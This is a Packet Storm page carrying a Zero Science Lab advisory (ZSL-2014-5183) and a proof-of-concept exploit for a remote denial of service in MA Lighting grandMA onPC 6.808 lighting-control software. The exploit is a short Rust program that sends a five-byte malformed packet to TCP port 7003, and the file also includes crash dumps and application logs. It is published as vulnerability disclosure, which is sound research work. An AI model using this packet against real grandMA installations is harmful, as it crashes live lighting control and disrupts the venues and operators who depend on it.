what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MA Lighting Technology grandMA onPC 6.808 Denial Of Service

MA Lighting Technology grandMA onPC 6.808 Denial Of Service
Posted Apr 3, 2014
Authored by LiquidWorm | Site zeroscience.mk

MA Lighting Technology grandMA onPC version 6.808 is exposed to a remote denial of service issue when processing socket connection negotiation. This issue occurs when the application handles a single malformed packet over TCP port 7003, resulting in a crash.

tags | exploit, remote, denial of service, tcp
SHA-256 | 1d85de1ce8040c6d45a103d51029790fa8c1838d9264532526cc629595516360

MA Lighting Technology grandMA onPC 6.808 Denial Of Service

Change Mirror Download
/*

MA Lighting Technology grandMA onPC v6.808 Remote Denial of Service Exploit


Vendor: MA Lighting Technology GmbH
Product web page: http://www.malighting.com
Affected version: grandMA series 1 onPC Software 6.808 (6.801)

Summary: The grandMA onPC software incorporates all functions of a grandMA
console and offers you its full potential on your notebook or PC. You can
use grandMA onPC for running, programming or offline pre-programming, as
well as a smart backup solution within the grandMA system. With the MA onPC
command wing and MA onPC fader wing MA Lighting has developed a sophisticated
hardware extension perfectly suited for the grandMA onPC software.

Desc: grandMA onPC version 6.808 is exposed to a remote denial of service
issue when processing socket connection negotiation. This issue occurs when
the application handles a single malformed packet over TCP port 7003, resulting
in a crash.

===========================================================================

(1324.be4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3535393f ebx=07279f80 ecx=35353937 edx=0c05f038 esi=3535393f edi=3535393b
eip=77ce22c2 esp=0c05ef7c ebp=0c05ef90 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
ntdll!RtlEnterCriticalSection+0x12:
77ce22c2 f00fba3000 lock btr dword ptr [eax],0 ds:002b:3535393f=????????

--

303.640 GMA : RR NEW STATION IN NETWORK 127.0.0.1(100) AS Standalone
367.147 SHAR: RPC COMMAND UNSUPPORTED CMD 542393671 from 127.0.0.1
367.147 SHAR: SHARED_REMOTECALL NOT TERMINATED CORRECTLY !
367.180 CC : ******* EXCEPTION **************************
367.180 CC : * ACCESS_VIOLATION
367.180 CC : * EAX = 37363341 EBX = 6D856B0
367.180 CC : * ECX = 37363339 EDX = B78F41C
367.180 CC : * ESI = 37363341 EDI = 3736333D
367.180 CC : * DESKTYP : GMA [Windows]
367.180 CC : * VERSION : 6.808 STREAMING : 6801
367.180 CC : ********************************************
367.240 CC : 0x775522c2 RtlEnterCriticalSection() + 0x12

===========================================================================


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2014-5183
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5183.php


31.03.2014

*/


use std::io::net::ip::SocketAddr;
use std::io::net::tcp::TcpStream;

fn bann() {
println!("
+======================================+
| grandMA onPC 6.808 Denial of Service |
|--------------------------------------|
| |
| ID: ZSL-2014-5183 |
+======================================+
");
}

fn main() {
bann();
println!("\n[*] Sending packet to local host on tcp port 7003\n");
let addr = from_str::<SocketAddr>("127.0.0.1:7003").unwrap();
let mut socket = TcpStream::connect(addr).unwrap();
socket.write(bytes!("\x74\x30\x30\x74\x21"));
println!("[*] Crashed!\n");
}
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close